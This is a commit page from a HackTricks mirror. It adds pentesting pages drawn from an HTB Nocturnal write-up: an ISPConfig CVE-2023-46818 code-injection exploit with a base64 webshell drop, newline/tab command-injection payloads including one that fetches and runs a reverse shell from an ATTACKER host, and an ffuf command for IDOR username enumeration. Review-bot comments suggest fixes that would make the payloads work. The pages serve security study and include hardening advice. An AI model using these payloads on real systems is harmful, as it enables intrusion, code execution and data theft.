mirror of https://github.com/HackTricks-wiki/hacktricks.git (synced 2025-10-10 18:36:50 +00:00)

	Add content from: HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig...
- Remove searchindex.js (auto-generated file)
parent: 7b609aef63
commit: 399a99eefa

				| @ -430,6 +430,7 @@ | ||||
|   - [H2 - Java SQL database](network-services-pentesting/pentesting-web/h2-java-sql-database.md) | ||||
|   - [IIS - Internet Information Services](network-services-pentesting/pentesting-web/iis-internet-information-services.md) | ||||
|   - [ImageMagick Security](network-services-pentesting/pentesting-web/imagemagick-security.md) | ||||
|   - [Ispconfig](network-services-pentesting/pentesting-web/ispconfig.md) | ||||
|   - [JBOSS](network-services-pentesting/pentesting-web/jboss.md) | ||||
|   - [Jira & Confluence](network-services-pentesting/pentesting-web/jira.md) | ||||
|   - [Joomla](network-services-pentesting/pentesting-web/joomla.md) | ||||
|  | ||||
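Review bot: the new SUMMARY entry spells the product `Ispconfig`, while the page added in this commit is titled `# ISPConfig` and the pentesting-web index hunk uses `ISPConfig`; use `ISPConfig` in all three so the sidebar, the index and the page title match (the other entries such as `IIS`, `JBOSS` keep the vendor capitalization too).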
| @ -82,6 +82,7 @@ Some **tricks** for **finding vulnerabilities** in different well known **techno | ||||
| - [**Golang**](golang.md) | ||||
| - [**GraphQL**](graphql.md) | ||||
| - [**H2 - Java SQL database**](h2-java-sql-database.md) | ||||
| - [**ISPConfig**](ispconfig.md) | ||||
| - [**IIS tricks**](iis-internet-information-services.md) | ||||
| - [**Microsoft SharePoint**](microsoft-sharepoint.md) | ||||
| - [**JBOSS**](jboss.md) | ||||
|  | ||||
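Review bot: the new `ISPConfig` entry is inserted before `IIS tricks`, which breaks the alphabetical run Golang, GraphQL, H2, IIS that this list otherwise follows (I-I sorts before I-S); move it one line down, after `- [**IIS tricks**](iis-internet-information-services.md)`, which is also where the SUMMARY hunk places it.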
							
								
								
									
src/network-services-pentesting/pentesting-web/ispconfig.md (new file, 107 lines)
							| @ -0,0 +1,107 @@ | ||||
| # ISPConfig | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| ## Overview | ||||
| 
 | ||||
| ISPConfig is an open-source hosting control panel. Older 3.2.x builds shipped a language file editor feature that, when enabled for the super administrator, allowed arbitrary PHP code injection via a malformed translation record. This can yield RCE in the web server context and, depending on how PHP is executed, privilege escalation. | ||||
| 
 | ||||
| Key default paths: | ||||
| - Web root often at `/var/www/ispconfig` when served with `php -S` or via Apache/nginx. | ||||
| - Admin UI reachable on the HTTP(S) vhost (sometimes bound to localhost only; use SSH port-forward if needed). | ||||
| 
 | ||||
| Tip: If the panel is bound locally (e.g. `127.0.0.1:8080`), forward it: | ||||
| 
 | ||||
| ```bash | ||||
| ssh -L 9001:127.0.0.1:8080 user@target | ||||
| # then browse http://127.0.0.1:9001 | ||||
| ``` | ||||
| 
 | ||||
| ## Language editor PHP code injection (CVE-2023-46818) | ||||
| 
 | ||||
| - Affected: ISPConfig up to 3.2.11 (fixed in 3.2.11p1) | ||||
| - Preconditions: | ||||
|   - Login as the built-in superadmin account `admin` (other roles are not affected according to the vendor) | ||||
|   - Language editor must be enabled: `admin_allow_langedit=yes` in `/usr/local/ispconfig/security/security_settings.ini` | ||||
| - Impact: Authenticated admin can inject arbitrary PHP that is written into a language file and executed by the application, achieving RCE in the web context | ||||
| 
 | ||||
| References: NVD entry CVE-2023-46818 and vendor advisory link in the References section below. | ||||
| 
 | ||||
| ### Manual exploitation flow | ||||
| 
 | ||||
| 1) Open/create a language file to obtain CSRF tokens | ||||
| 
 | ||||
| Send a first POST to initialize the form and parse the CSRF fields from the HTML response (`csrf_id`, `csrf_key`). Example request path: `/admin/language_edit.php`. | ||||
| 
 | ||||
| 2) Inject PHP via records[] and save | ||||
| 
 | ||||
| Submit a second POST including the CSRF fields and a malicious translation record. Minimal command-execution probes: | ||||
| 
 | ||||
| ```http | ||||
| POST /admin/language_edit.php HTTP/1.1 | ||||
| Host: 127.0.0.1:9001 | ||||
| Content-Type: application/x-www-form-urlencoded | ||||
| Cookie: ispconfig_auth=... | ||||
| 
 | ||||
| lang=en&module=admin&file=messages&csrf_id=<id>&csrf_key=<key>&records[]=<?php echo shell_exec('id'); ?> | ||||
| ``` | ||||
| 
 | ||||
| Out-of-band test (observe ICMP): | ||||
| 
 | ||||
| ```http | ||||
| records[]=<?php echo shell_exec('ping -c 1 10.10.14.6'); ?> | ||||
| ``` | ||||
| 
 | ||||
| 3) Write files and drop a webshell | ||||
| 
 | ||||
| Use `file_put_contents` to create a file under a web-reachable path (e.g., `admin/`): | ||||
| 
 | ||||
| ```http | ||||
| records[]=<?php file_put_contents('admin/pwn.txt','owned'); ?> | ||||
| ``` | ||||
| 
 | ||||
| Then write a simple webshell using base64 to avoid bad characters in the POST body: | ||||
| 
 | ||||
| ```http | ||||
| records[]=<?php file_put_contents('admin/shell.php', base64_decode('PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsiY21kIl0pIDsgPz4K')); ?> | ||||
| ``` | ||||
| 
 | ||||
| Use it: | ||||
| 
 | ||||
| ```bash | ||||
| curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id' | ||||
| ``` | ||||
| 
 | ||||
| If PHP is executed as root (e.g., via `php -S 127.0.0.1:8080` started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user. | ||||
| 
 | ||||
| ### Python PoC | ||||
| 
 | ||||
| A ready-to-use exploit automates token handling and payload delivery: | ||||
| - [https://github.com/bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit) | ||||
| 
 | ||||
| Example run: | ||||
| 
 | ||||
| ```bash | ||||
| python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password> | ||||
| ``` | ||||
| 
 | ||||
| ### Hardening | ||||
| 
 | ||||
| - Upgrade to 3.2.11p1 or later | ||||
| - Disable the language editor unless strictly needed: | ||||
| 
 | ||||
| ``` | ||||
| admin_allow_langedit=no | ||||
| ``` | ||||
| 
 | ||||
| - Avoid running the panel as root; configure PHP-FPM or the web server to drop privileges | ||||
| - Enforce strong authentication for the built-in `admin` account | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [ISPConfig 3.2.11p1 Released (fixes language editor code injection)](https://www.ispconfig.org/blog/ispconfig-3-2-11p1-released/) | ||||
| - [CVE-2023-46818 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-46818) | ||||
| - [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit) | ||||
| - [HTB Nocturnal: Root via ISPConfig language editor RCE](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
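Review bot: the raw request in the `POST /admin/language_edit.php` example sends `records[]=<?php echo shell_exec('id'); ?>` unencoded in an `application/x-www-form-urlencoded` body; spaces, `<`, `'`, `;` and `>` must be percent-encoded (or the value sent through a client that encodes it), otherwise the request is malformed, and the later sentence that base64 is used "to avoid bad characters in the POST body" contradicts these raw examples. Suggest `records[]=%3C%3Fphp%20echo%20shell_exec%28%27id%27%29%3B%20%3F%3E` and a one-line remark that the `records[]` snippets are shown decoded for readability. Second point: `file_put_contents('admin/pwn.txt','owned')` and `file_put_contents('admin/shell.php', ...)` use relative paths, which resolve against the working directory of the PHP process; that is the web root in the `php -S` scenario the page describes but not necessarily under Apache/nginx with PHP-FPM, so either use an absolute path (or `__DIR__`) or state that assumption next to the "Write files and drop a webshell" step. Minor: the `10.10.14.6` ICMP target is a lab address and should be marked as a placeholder like `ATTACKER` is elsewhere in this commit.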
| @ -131,6 +131,37 @@ powershell C:**2\n??e*d.*? # notepad | ||||
| ../linux-hardening/bypass-bash-restrictions/ | ||||
| {{#endref}} | ||||
| 
 | ||||
| ##### Newline and tab blacklist bypass (space and metacharacters filtered) | ||||
| 
 | ||||
| Many “naive blacklist” filters block space and shell metacharacters like `;`, `&`, `|`, `` ` ``, `{`, `}`, `&&`, but forget to block newlines (`%0a`) and tabs (`%09`). If user input is concatenated into a shell command (for example via PHP `proc_open()`/`system()`), you can: | ||||
| 
 | ||||
| - Inject a newline to start a new command | ||||
| - Use tabs as whitespace where space is blocked | ||||
| 
 | ||||
| Example payload for a password-like field reaching a shell (URL-encoded): | ||||
| 
 | ||||
| ``` | ||||
| 0xdf%0abash%09-c%09"id"%0a | ||||
| ``` | ||||
| 
 | ||||
| The resulting process executes as two lines: | ||||
| 
 | ||||
| ``` | ||||
| zip -x './backups/*' -r -P 0xdf | ||||
| bash	-c	"id" | ||||
| ``` | ||||
| 
 | ||||
| Chaining without `&`: fetch and execute a reverse shell in separate lines: | ||||
| 
 | ||||
| ``` | ||||
| 0xdf%0abash%09-c%09"curl%09http://ATTACKER/rev.sh"%0abash%09rev.sh%0a | ||||
| ``` | ||||
| 
 | ||||
| Notes | ||||
| - Newlines are command separators for POSIX shells; tabs are valid whitespace. | ||||
| - This works even if spaces and `;|&` are filtered, as long as `\n` and `\t` are not. | ||||
| - See PHP docs for `proc_open()`/`system()` behavior when given a string (it spawns `/bin/sh -c`). | ||||
| 
 | ||||
| ### Node.js `child_process.exec` vs `execFile` | ||||
| 
 | ||||
| When auditing JavaScript/TypeScript back-ends you will often encounter the Node.js `child_process` API. | ||||
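Review bot: the chained payload `0xdf%0abash%09-c%09"curl%09http://ATTACKER/rev.sh"%0abash%09rev.sh%0a` never saves `rev.sh`: `curl` writes the response to stdout, so the following `bash rev.sh` fails with "No such file". Add an output option inside the quoted command, still tab-separated, e.g. `"curl%09-o%09rev.sh%09http://ATTACKER/rev.sh"` (or `-O`), and say where the file lands (the sink's working directory). Two smaller points: the illustration `zip -x './backups/*' -r -P 0xdf` appears without saying that the injected field is the `-P` password argument of a `zip` call, so one sentence naming the sink would make the "two lines" rendering self-explanatory; and the new heading is `#####` while the sibling `### Node.js child_process.exec vs execFile` heading in the same file is h3, so it should be `###` to sit at the same TOC level.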
| @ -170,5 +201,7 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject | ||||
| - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection) | ||||
| - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection) | ||||
| - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html) | ||||
| - [PHP proc_open manual](https://www.php.net/manual/en/function.proc-open.php) | ||||
| - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) | ||||
| 
 | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
|  | ||||
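Review bot: the new reference title `HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)` appears to use non-ASCII hyphen characters in the CVE id, unlike `CVE-2023-46818` everywhere else in this commit; use plain ASCII `-` so a text search or grep for the CVE id matches this entry.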
| @ -38,6 +38,27 @@ for id in $(seq 64185742 64185700); do | ||||
| done | ||||
| ``` | ||||
| 
 | ||||
| --- | ||||
| 
 | ||||
| ### Error-response oracle for user/file enumeration | ||||
| 
 | ||||
| When a download endpoint accepts both a username and a filename (e.g. `/view.php?username=<u>&file=<f>`), subtle differences in error messages often create an oracle: | ||||
| 
 | ||||
| - Non-existent username → "User not found" | ||||
| - Bad filename but valid extension → "File does not exist" (sometimes also lists available files) | ||||
| - Bad extension → validation error | ||||
| 
 | ||||
| With any authenticated session, you can fuzz the username parameter while holding a benign filename and filter on the "user not found" string to discover valid users: | ||||
| 
 | ||||
| ```bash | ||||
| ffuf -u 'http://target/view.php?username=FUZZ&file=test.doc' \ | ||||
|   -b 'PHPSESSID=<session-cookie>' \ | ||||
|   -w /opt/SecLists/Usernames/Names/names.txt \ | ||||
|   -fr 'User not found' | ||||
| ``` | ||||
| 
 | ||||
| Once valid usernames are identified, request specific files directly (e.g., `/view.php?username=amanda&file=privacy.odt`). This pattern commonly leads to unauthorized disclosure of other users’ documents and credential leakage. | ||||
| 
 | ||||
| --- | ||||
| ## 2. Real-World Case Study – McHire Chatbot Platform (2025) | ||||
| 
 | ||||
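Review bot: the closing paragraph jumps to `/view.php?username=amanda&file=privacy.odt` without saying how the attacker learns that filename, even though the bullet list above notes that the bad-filename response "sometimes also lists available files"; make that the explicit middle step: after enumerating usernames, request `?username=<valid>&file=x.doc` (valid extension, non-existent name) to read the listing, then fetch each listed file. Also, the ffuf command's `-fr 'User not found'` relies on the exact error string; a short hint that `-fs` on response size or `-ac` works when the message differs would make the example portable, and the wordlist path `/opt/SecLists/Usernames/Names/names.txt` should be marked as a local example path rather than a fixed location.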
| @ -86,4 +107,5 @@ Combined with **default admin credentials** (`123456:123456`) that granted acces | ||||
| * [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants’ PII](https://ian.sh/mcdonalds) | ||||
| * [OWASP Top 10 – Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/) | ||||
| * [How to Find More IDORs – Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489) | ||||
| * [HTB Nocturnal: IDOR oracle → file theft](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) | ||||
| {{#include ../banners/hacktricks-training.md}} | ||||
|  | ||||